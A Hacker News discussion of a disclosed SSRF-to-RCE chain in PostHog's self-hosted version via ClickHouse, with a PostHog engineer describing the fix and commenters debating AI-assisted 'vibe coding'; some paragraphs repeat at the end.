I work on security at PostHog. We resolved these SSRF findings back in October 2024 when this report was responsibly disclosed to us. I'm currently gathering the relevant PRs so that we can share them here. We're also working on some architectural improvements around egress, namely using smokescreen, to better protect against this class of issue.
piccirello 10 hours ago [-]
Here's the PR[0] that resolved the SSRF issue. This fix was shipped within 24 hours of receiving the initial report.
It's worth noting that at the time of this report, this only affected PostHog's single tenant hobby deployment (i.e. our self hosted version). Our Cloud deployment used our Rust service for sending webhooks, which has had SSRF protection since May 2024[1].
Since this report we've evolved our Cloud architecture significantly, and we have similar IP-based filtering throughout our backend services.
> As it described on Clickhouse documentation, their API is designed to be READ ONLY on any operation for HTTP GET As described in the Clickhouse documentation, their API is designed to be READ ONLY on any operation for HTTP GET requests.
lkt 12 hours ago [-]
Out of interest, how much does ZDI pay for a bug like this?
rs_rs_rs_rs_rs 4 hours ago [-]
They probably don't accept something like this. Not that many Posthog self-hosted instances out there...
lkt 4 hours ago [-]
That's what I thought too, but the article says it was submitted to ZDI and they handled the communication with Posthog
danr4 2 hours ago [-]
Very nice write up!
14 hours ago [-]
anothercat 12 hours ago [-]
Does this require authenticated access to the posthog api to kick off? In that case I feel clickhouse and posthog both have their share of the blame here.
nightpool 12 hours ago [-]
It looks like the entire class of bugs here are "if you have access to Posthog's admin dashboard, you can configure webhook URLs that hit Posthog's internal services". That's not particularly surprising for a self-hosted system like the author's, but I expect it would pretty bad if you were using their cloud-hosted product.
anothercat 3 hours ago [-]
Ah of couse! I forgot about the cloud hosted option.
thenaturalist 13 hours ago [-]
Wow, chapeau to the author.
What an elegant, interesting read.
What I don't quite understand: Why is the Clickhouse bug not given more scrutiny?
Like that escape bug was what made the RCE possible and certainly a core DB company like ClickHouse should be held accountable for such an oversight?
matmuls 13 hours ago [-]
ssrf was the entry point, and clickhouse is supposed to be an internal only service, but one could reach it only with that ssrf, so hence less of "scrutiny". The 0day by itself wouldnt be useful, unless an attacker can reach clickhouse, which they usually can't.
thenaturalist 12 hours ago [-]
But if they do, prohibiting SQL injection, a critical last mile vulnerability, seems trivial?
ch2026 11 hours ago [-]
Sure, it’s a bug they can fix. But it’s more the setup itself that’s the issue. For example clickhouse’s HTTP interface would normally require user/pass auth and not have access to all privileges. Clickhouse has a table engine that maps to local processes too (eg select from a python process you pipe stdin into).
No need for postgres if you have a fully authenticated user.
nightpool 11 hours ago [-]
The author already had basically full Clickhouse querying abilities, and Clickhouse lets you run arbitrary SQL on postgres, the fact that the author used a read-only command to execute it wasn't the author bypassing a security boundary (anyone with access to the Clickhouse DB also had access to the Postgres DB), it was just a gadget that made the SSRF more convenient. They could have escalated it into a different internal HTTP API instead.
PostHog does a lot of vibe coding, I wonder how many other issues they have.
Nextgrid 13 hours ago [-]
Not that I’m disproving it but do you have a source? Companies say all kinds of things for hype and to attract investors, but it doesn’t necessarily make it true.
matmuls 12 hours ago [-]
looking at their commits, there are about 300+ commits tagged with " Generated with https://claude.com/claude-code" attribution.
dewey 12 hours ago [-]
Just because AI tools are involved doesn't mean it's "Vibe coding".
somat 7 hours ago [-]
If you leave "Generated with claude-code" in the commit message, It was vibe coded.
Unfortunately a lot of people think it means any time an LLM helps write code, but I think we're winning that semantic battle - I'm seeing more examples of it used correctly than incorrectly these days.
It's likely that the majority of code will be AI assisted in some way in the future, at which point calling all of it "vibe coding" will lose any value at all. That's why I prefer the definition that specifies unreviewed.
chrisweekly 8 hours ago [-]
I share your preference. (I also mourn the loss of the word "vibe" for other contexts.) In this case there were apparently hundreds of commit messages stating "generated by Claude Code". I feel like there's a missing set of descriptors -- something similar to Creative Commons with its now-familiar labels like "CC-BY-SA" -- that could be used to indicate the relative degree of human involvement. Full-on "AI-YOLO-Paperclips" at one extreme could be distinguished from "AI-IDE-TA" for typeahead / fancy autocomplete at the other. Simon, you're in a fantastic position to champion some kind of basic system like this. If you run w/ this idea, please give me a shout-out. :)
bopbopbop7 9 hours ago [-]
I also hope that majority of the code in the future is AI assisted like it is with PostHog because my cyber security firm is going to make so much money.
hsbauauvhabzb 11 hours ago [-]
It sure is a pretty good indicator, and if you underestimate human laziness you’re gonna have a bad time regardless.
jwpapi 11 hours ago [-]
Also looking at how much they’ve released and how fast and how they blog like they own the world (or design the website)
I used to look up to Posthog as I thought, wow this is a really good startup. They’re achieving a lot fast actually.
But turns out a lot was sloppy. I don’t trust them no more and would opt for another platform now.
Rendered at 10:43:26 GMT+0000 (Coordinated Universal Time) with Vercel.
It's worth noting that at the time of this report, this only affected PostHog's single tenant hobby deployment (i.e. our self hosted version). Our Cloud deployment used our Rust service for sending webhooks, which has had SSRF protection since May 2024[1].
Since this report we've evolved our Cloud architecture significantly, and we have similar IP-based filtering throughout our backend services.
[0] https://github.com/PostHog/posthog/pull/25398
[1] https://github.com/PostHog/posthog/commit/281af615b4874da1b8...
> As it described on Clickhouse documentation, their API is designed to be READ ONLY on any operation for HTTP GET As described in the Clickhouse documentation, their API is designed to be READ ONLY on any operation for HTTP GET requests.
What an elegant, interesting read.
What I don't quite understand: Why is the Clickhouse bug not given more scrutiny?
Like that escape bug was what made the RCE possible and certainly a core DB company like ClickHouse should be held accountable for such an oversight?
No need for postgres if you have a fully authenticated user.
Unfortunately a lot of people think it means any time an LLM helps write code, but I think we're winning that semantic battle - I'm seeing more examples of it used correctly than incorrectly these days.
It's likely that the majority of code will be AI assisted in some way in the future, at which point calling all of it "vibe coding" will lose any value at all. That's why I prefer the definition that specifies unreviewed.
I used to look up to Posthog as I thought, wow this is a really good startup. They’re achieving a lot fast actually.
But turns out a lot was sloppy. I don’t trust them no more and would opt for another platform now.